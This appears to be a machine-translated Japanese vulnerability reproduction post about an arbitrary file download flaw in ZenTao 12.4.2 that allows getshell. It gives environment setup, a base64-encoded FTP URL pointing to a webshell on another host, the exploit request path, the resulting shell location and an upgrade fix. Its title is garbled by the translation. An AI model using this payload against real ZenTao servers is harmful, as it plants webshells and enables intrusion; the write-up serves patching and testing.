ZenTao 12.4.2 の Getshell のバックグラウンド管理者権限は何ですか?

0x00はじめに

ZenTao は、製品管理とプロジェクト管理、品質を統合するプロフェッショナルな国産オープンソース R&D プロジェクト管理ソフトウェアです。管理、文書管理、組織管理、取引管理など、研究開発プロジェクト管理の中核プロセスを完全にカバーします。経営理念は、国際的に普及しているアジャイルプロジェクト管理手法「スクラム」に基づいており、その価値観を踏襲し、国内のプロジェクト研究開発の現状と合わせて、タスク管理、需要管理、バグ管理などの複数の機能を統合しています。 、ユースケース管理など、ソフトウェアの計画からリリースのライフサイクル全体をカバーします。

0x01 脆弱性の概要

ZenTao 12.4.2 バージョンには、クライアント クラスのダウンロード メソッドのフィルタリングが緩いことが原因で、任意のファイルがダウンロードされる脆弱性があります。これは ftp を使用して実現できます ファイルをダウンロードする目的。そして、ダウンロードされたファイルの保存ディレクトリはphpファイルを解析し、getshellを引き起こす可能性があります。

0x02 影響を受けるバージョン

ZenTao≤ 12.4.2

0x03環境構築

phpstudy2018 Zen Tao 12.4 .2 Zen Tao 公式ダウンロードアドレス:

https://www.zentao.net/dynamic/zentaopms12.4.2-80263.html

3.1. ダウンロードが完了したら、 phpstudy

#3 にインストールするだけです 3.2. 拡張機能を確認します 失敗する拡張機能がある場合は、phpstudy で拡張機能を開きます。

#3.3. データベース情報を設定し、ここで独自のデータベース構成に設定します。

#3.4. アカウントを設定するとインストールが完了します

#3.4.環境を使用して ftp サービスを設定し、有効にします。Windows2008R2 を例として、ロールを追加し、ftp

##3.5 を追加します。インターネット インフォメーション サービス 以下の Web サイトに FTP サービスを追加します。

3.6. 独自の状況に応じて設定し、次のステップは

3.7. ftp ディレクトリに webshel​​l を配置し、ブラウザで ftp に正常にアクセスできるか確認します。

#0x04 脆弱性の再発

1. まず、ftp のパスをシェルに追加し、base64 エンコードを実行します。

暗号化前: ftp://192.168.3.200/shell.php

暗号化後: ZnRwJTNBLy8xOTIuMTY4LjMuMjAwL3NoZWxsLnBocA==

2. EXP を使用し、暗号化された Base64 を exp

http://127.0.0.1/zentaopms/www の に入れます。 /index.php /client-download-1--1.html

#3.次のリンク パスを使用して、シェルがサーバーにダウンロードされたかどうかをテストします。

http://192.168.3.200/zentaopms/www/data/client/1/shell.php

0x05 修復方法

1. ZenTao 12.4.3 以降のバージョンにアップグレードします

以上がZenTao 12.4.2 の Getshell のバックグラウンド管理者権限は何ですか?の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。